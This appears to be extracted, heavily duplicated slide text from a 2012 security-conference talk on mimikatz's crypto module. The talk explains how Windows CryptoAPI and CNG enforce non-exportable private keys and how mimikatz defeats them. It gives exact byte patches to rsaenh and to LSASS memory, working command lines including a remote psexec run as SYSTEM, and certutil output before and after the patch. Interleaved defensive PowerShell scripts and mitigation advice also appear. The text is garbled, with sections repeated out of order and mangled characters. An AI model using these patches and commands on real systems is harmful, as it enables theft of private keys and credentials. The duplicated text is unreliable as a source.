NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz / crypto / cng: how it's exported (... level)
[Diagram: a process asks CNG to export a key; the request goes over RPC to the KeyIso service inside the LSASS process (NT6 System protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / SYSTEM_MANDATORY_LABEL_NO_READ_UP). LSASS loads the private key (DPAPI decode, "PLAYSKOOL") and checks "Exportable?": yes -> Exported Key; no -> NTE_NOT_SUPPORTED.]
mimikatz / crypto / patch cng: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso), ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz # crypto::exportKeys
[user] Clés CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Exportabilité : NON
  Taille clé : 2048
  Export privé dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk : KO
  mod_cryptong::getPrivateKey ; PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz / crypto / patch cng: because sometimes I own LSASS
This time the checks and the keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...
.text:6C815210 75 1C    jnz     short continue_key_export
.text:6C815210 EB 1C    jmp     short continue_key_export
mimikatz / crypto / patch cng: demo time
Import, export, import as not exportable... export again!
mimikatz / crypto / patch cng: limitations
The patch operation needs some privileges:
- Admin (debug privilege)
- SYSTEM
mimikatz crypto::patchcng only deals with:
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
- certutil can...
mimikatz / crypto / patch cng: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
- Yeah, like the good old certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX: ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX: La commande s'est terminée correctement.
mimikatz / crypto: memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  * So yes, mimikatz can export it
mimikatz / crypto: what we can do
Exactly the same as for sekurlsa: prevent access to accounts / the computer
- no admin, no admin, no admin...
Basics
- Use smartcards / tokens for user certificates
- Use Hardware Security Modules (HSM), even SoftHSM
More in depth
- See what Microsoft can do with the TPM from Windows 8
  * Virtual SmartCard seems promising
- Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP
  * Their biometrics stuff was a little buggy ;)
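To make the "smartcards / HSM / TPM" advice concrete, here is an added PowerShell example (not code from the slides or from mimikatz) that enrols two test keys: one in the Microsoft Software Key Storage Provider, the provider the LSASS patch targets, and one in the TPM-backed Microsoft Platform Crypto Provider, which never hands out a plaintext private key. It assumes Windows 10 / Server 2016 or later with a provisioned TPM; the subject names are placeholders.

```powershell
# Added example (not from the slides). Two test enrolments showing the configuration
# difference behind "use smartcards / HSM / TPM": software KSP versus TPM KSP.
# Assumptions: Windows 10 / Server 2016 or later, a provisioned TPM, placeholder subjects.

$softwareKsp = 'Microsoft Software Key Storage Provider'
$tpmKsp      = 'Microsoft Platform Crypto Provider'
$store       = 'Cert:\CurrentUser\My'

# Weak: software-held key. NonExportable only sets a flag on a DPAPI-protected key file;
# the export decision is the single check inside LSASS that the slides patch.
$weak = New-SelfSignedCertificate -Subject 'CN=asfws-demo-software' -KeyAlgorithm RSA -KeyLength 2048 `
    -Provider $softwareKsp -KeyExportPolicy NonExportable -CertStoreLocation $store

# Better: TPM-held key. The private key is generated and used inside the TPM; the KSP has
# no plaintext key to return, so there is nothing for an export path to hand out.
$tpm = New-SelfSignedCertificate -Subject 'CN=asfws-demo-tpm' -KeyAlgorithm RSA -KeyLength 2048 `
    -Provider $tpmKsp -KeyExportPolicy NonExportable -CertStoreLocation $store

# Verify from the certificate itself which provider actually holds each key.
foreach ($cert in @($weak, $tpm)) {
    $key = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert).Key
    '{0,-25} provider={1,-45} export policy={2}' -f $cert.Subject, $key.Provider.Provider, $key.ExportPolicy
}

# Clean-up. Remove-Item on the Cert: drive alone leaves the key container behind (the memo
# slide's point); -DeleteKey removes the key together with the certificate.
Remove-Item -Path "$store\$($weak.Thumbprint)" -DeleteKey
Remove-Item -Path "$store\$($tpm.Thumbprint)" -DeleteKey
```

Both keys report the same export policy (NonExportable); what differs is the provider line, and that is the property worth auditing, because for a software-backed key the policy is only as strong as the code that checks it.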
mimikatz: what else can it do?
- Play with minesweeper
- Manipulate some handles
- Pass the hash
- Dump SAM / AD
- Stop event monitoring
- Patch Terminal Server
- Basic GPO bypass
- AppLocker / SRP bypass
- Driver
  * Play with tokens & privileges
  * Display SSDT x86 & x64
  * List minifilters actions
  * List Notifications (process, thread, image, registry)
  * List Objects hooks and procedures
  * ...
- ...
mimikatz: that's all folks
Thanks to / Merci à
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  * Partners and Sponsors, for sure
- Microsoft for always considering it normal/acceptable
- Security friends/community for their ideas & challenges
  * nagual, newsoft, mubix, ...
- You for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz / crypto: what is it?
A little module that I wrote to:
- play with the Windows Cryptographic API, CNG and RSA keys
- automate the export of certificates/keys
  * Even those which are "not" exportable
What the crypto module can do:
- List
  * Providers
  * Stores
  * Certificates
  * Keys
- Export
  * Certificates
    - public, in DER format
    - with private keys, in PFX format
  * Private keys in PVK format
    - it's cool, OpenSSL can deal with it too
- Patch
  * CryptoAPI, in mimikatz context
  * CNG, in LSASS context (again?)
(mod_mimikatz_crypto)
mimikatz / crypto: how it's protected
Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  * At least, not without the master keys and/or passwords of the users
Computer/User can load their own keys because they have enough secrets to do it (e.g. session opened)
- Yes, a computer/server opens a "session"
Export/Usage can be limited by:
- Password
- Popup
- Export/Archive flag not present
Constraint for most users / Unavailable for computer keys
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
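A defender-side check for two points made on these slides: the export flag above is the only thing standing between a software-held key and an export, and the memo slide notes that re-imports duplicate keys and that deleting a certificate leaves its private key on disk. The following PowerShell is an added example, not code from the slides or from mimikatz. It assumes .NET Framework 4.6 or later (for RSACertificateExtensions), the default per-user key directories, and that the unique container name equals the key file name, which holds for the software providers listed; the provider list itself is the one from the limitation slides.

```powershell
# Added example (not from the slides, not mimikatz code). Inventory of the private keys
# behind Cert:\CurrentUser\My, then key files on disk that no certificate there references.
# Assumptions: .NET Framework 4.6+ (RSACertificateExtensions); default user key directories.

$storePath = 'Cert:\CurrentUser\My'

# Providers whose keys are DPAPI-protected files, i.e. the ones the slides' patches
# target (rsaenh.dll CSPs and the software KSP). Anything else is smart card, HSM or TPM.
$softwareProviders = @(
    'Microsoft Base Cryptographic Provider v1.0',
    'Microsoft Enhanced Cryptographic Provider v1.0',
    'Microsoft Enhanced RSA and AES Cryptographic Provider',
    'Microsoft RSA SChannel Cryptographic Provider',
    'Microsoft Strong Cryptographic Provider',
    'Microsoft Software Key Storage Provider'
)

function Get-PrivateKeyBacking {
    # Returns which API holds the certificate's key, which provider, the export flag and
    # the on-disk container name; $null for certificates without an RSA private key.
    param([System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)
    if (-not $Cert.HasPrivateKey) { return $null }
    $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($Cert)
    if ($rsa -is [System.Security.Cryptography.RSACng]) {
        # CNG: the facts live on the CngKey; UniqueName is the file name under Crypto\Keys
        $allowExport = [System.Security.Cryptography.CngExportPolicies]::AllowExport
        return [pscustomobject]@{
            Subject    = $Cert.Subject
            Api        = 'CNG'
            Provider   = $rsa.Key.Provider.Provider
            Exportable = (($rsa.Key.ExportPolicy -band $allowExport) -ne 0)
            KeyFile    = $rsa.Key.UniqueName
        }
    }
    if ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
        # CryptoAPI: same facts from the CSP container info; the unique name is the file under Crypto\RSA\<SID>
        $info = $rsa.CspKeyContainerInfo
        return [pscustomobject]@{
            Subject    = $Cert.Subject
            Api        = 'CAPI'
            Provider   = $info.ProviderName
            Exportable = $info.Exportable
            KeyFile    = $info.UniqueKeyContainerName
        }
    }
    return $null
}

$referenced = @{}   # container names still backing a certificate in the store
$inventory = foreach ($cert in Get-ChildItem -Path $storePath) {
    $backing = Get-PrivateKeyBacking -Cert $cert
    if ($backing) {
        if ($backing.KeyFile) { $referenced[$backing.KeyFile] = $true }
        $backing
    }
}

# 1. Software-backed keys are the ones a patched CSP/KSP hands out whatever the flag says.
$inventory |
    Select-Object Subject, Api, Provider, Exportable,
        @{ n = 'SoftwareBacked'; e = { $softwareProviders -contains $_.Provider } } |
    Format-Table -AutoSize

# 2. Key files nothing in the store points to any more: leftovers of deleted or
#    re-imported certificates, which crypto::exportKeys still enumerates.
$sid = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
$keyDirs = @(
    (Join-Path $env:APPDATA "Microsoft\Crypto\RSA\$sid"),   # CAPI user containers
    (Join-Path $env:APPDATA 'Microsoft\Crypto\Keys')        # software KSP user keys
)
$candidates = foreach ($dir in $keyDirs) {
    if (Test-Path -Path $dir) {
        Get-ChildItem -Path $dir -File | Where-Object { -not $referenced.ContainsKey($_.Name) }
    }
}
$candidates | Select-Object FullName, LastWriteTime | Format-Table -AutoSize
```

Run it in the user's own session. In the first table the column that matters is Provider, not Exportable: a non-exportable flag on a software-backed key is exactly what the later slides bypass. The second list is a set of candidates, not a verdict, because keys used by other stores or by non-certificate consumers (EFS, applications) also live in those directories; confirm each with `certutil -user -key` before deleting anything.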
mimikatz / crypto / capi: how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
- http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here...) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, ...
- cryptdll.dll, rsaenh.dll, ...
Processes deal with cryptographic keys through this API...
mimikatz / crypto / capi: how it's exported (... level)
[Diagram: inside the process, CryptoAPI and the RSA CSP load the private key (DPAPI decode, "PLAYSKOOL"); on "Ask to export Key" the CSP checks "Exportable?": yes -> Exported Key; no -> NTE_BAD_KEY_STATE. Everything happens in the caller's own address space.]
mimikatz / crypto / patch capi: because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz # crypto::exportCertificates
Emplacement : CERT_SYSTEM_STORE_CURRENT_USER\My
- Benjamin Delpy
  Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
  Provider : Microsoft Enhanced Cryptographic Provider v1.0
  Type : AT_KEYEXCHANGE
  Exportabilité : NON
  Taille clé : 2048
  Export privé dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx : KO
  (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
  Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der : OK
================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX: ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz / crypto / patch capi: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space
(two bytes per site: the 0F 85 opcode of jnz rel32 becomes 90 E9, nop + jmp rel32; the displacement stays the same because the replacement occupies the same 6 bytes and the jmp ends at the same address)
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz     continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp     continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF    jnz     continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp     continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
